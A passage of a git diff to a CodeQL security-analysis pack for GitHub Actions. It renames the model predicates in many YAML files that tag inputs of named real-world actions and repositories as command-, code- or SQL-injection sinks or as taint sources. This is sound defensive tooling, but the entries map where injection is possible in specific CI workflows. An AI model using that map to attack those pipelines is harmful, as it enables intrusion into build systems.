a/ql/lib/ext/dailydotdev_action-devcard.model.yml +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] - ["dailydotdev/action-devcard", "*", "input.commit_filename", "sql-injection", "manual"] 
diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml index afe3e82ca1f..11f1f10980f 100644 --- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml index 5b0a9dab38d..9ed2cb7908b 100644 --- a/ql/lib/ext/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] - ["daspn/private-actions-checkout", "*", "input.checkout_base_path", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml index 35bbd72f0a4..7f279f37a45 100644 --- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] - ["dawidd6/action-ansible-playbook", "*", "input.options", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index 472778d33b4..68f434f4797 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml 
+++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 1647e560730..890a47c79fc 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml index bbdad8287dd..aff5c330316 100644 --- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] - ["determinatesystems/magic-nix-cache-action", "*", "input.source-tag", "command-injection", "manual"] diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml index f3ac66006d9..8f5e22fa2d9 100644 --- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] - ["docker-practice/actions-setup-docker", "*", "input.docker_channel", "command-injection", "manual"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml index 9189245e228..ff0131da99e 100644 --- a/ql/lib/ext/docker_build-push-action.model.yml +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml index bd64fc37423..1d82fb8f836 100644 --- a/ql/lib/ext/endbug_latest-tag.model.yml +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] - ["endbug/latest-tag", "*", "input.tag-name", "command-injection", "manual"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml index 9a20279e110..1e4cc21dd13 100644 --- a/ql/lib/ext/expo_expo-github-action.model.yml +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] - ["expo/expo-github-action", "*", "input.packager", "command-injection", "manual"] 
diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml index 8d06bc8a512..ba729868a04 100644 --- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 9d066ac23ec..504f0693977 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] - ["frabert/replace-string-action", "*", "input.replace-with", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index 71d83774231..48267b6d082 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml index 563da9d4c0f..26eea1d2341 100644 --- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml 
+++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] - ["gabrielbb/xvfb-action", "*", "input.options", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml index 5194ce500fb..7993d827fa6 100644 --- a/ql/lib/ext/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] - ["game-ci/unity-builder", "*", "input.unityHubVersionOnMac", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index 8c2f32627d9..de48ea5a709 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml index f74ae81a52c..36a9b24f089 100644 --- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index 877543ea8e4..f04f8dda6c8 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] - ["actions/actions-runner-controller", "*", "input.image-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index 1c9d4a7f6d9..a37d6452d50 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] - ["adap/flower", "*", "input.setuptools-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index a9d65724735..352eb51996a 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] - ["agoric/agoric-sdk", "*", "input.path", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index d40014b9a12..44f34c11cb3 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index 7452ddc2187..3fd2e46296a 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] - ["airbytehq/airbyte", "*", "input.subcommand", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index a91d2c7b0e5..881374b6c90 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] - ["amazon-ion/ion-java", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index 95b5ba13ad1..6d77c866dc2 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 7157e1bea48..0b27c584584 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index a3f43d524b4..911d3e57155 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] - ["angular/dev-infra", "*", "input.workflow-artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index 6e0d980943a..1ac668cf55a 100644 
--- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] - ["ansible/ansible-lint", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index ef682ff4fff..5cf121dcef2 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] - ["ansible/awx", "*", "input.github-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index 7ce84599d17..d946204e9b9 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index 47f1c83016f..c6839a7b004 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] - ["apache/arrow-rs", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 54353368db2..9e708bbcc89 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index 119115c1560..cfb67540b17 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 762623ed27e..7186433e6d2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index 2272d7ff8e6..d39aafe162f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] - ["apache/camel-k", "*", "input.image-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index 3537169892a..a3b53b3ec96 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] - ["apache/camel", "*", "input.start-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index dfac696dddf..2a35d22a10e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] - ["apache/flink", "*", "input.env", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 2e28ad9e900..156d244ece2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index 5c82922c35e..fcda4b3dfec 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] - ["apache/nuttx", "*", "input.dotnet", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index d618f7b761f..84877f57d8c 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] - ["apache/opendal", "*", "input.setup", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index c49315d791a..dcb93d013a0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index f58fcf336fc..4776bb79067 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-actor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 4812eaa5b4a..2540e6a76ca 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index de8c3e1b725..525064de6a9 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] - ["appflowy-io/appflowy", "*", "input.flutter_profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index dee268884a1..b46d5a3ee6a 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] - ["aptos-labs/aptos-core", "*", "input.GCP_DOCKER_ARTIFACT_REPO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 5e0e5158390..631457c813e 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index bb4b41a0592..44d9eb10a0d 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index ef3a84762db..0d7f80698f5 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] - ["armbian/build", "*", "input.armbian_extensions", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 425242bf220..84caa043484 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] - ["auth0/auth0-java", "*", "input.signing-key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index 62f1ed005ed..f6aed253a21 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] - ["auth0/auth0.net", "*", "input.nuget-directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 098b460bbd8..1eac49617f2 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index d5a257be220..1efa6815c28 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml 
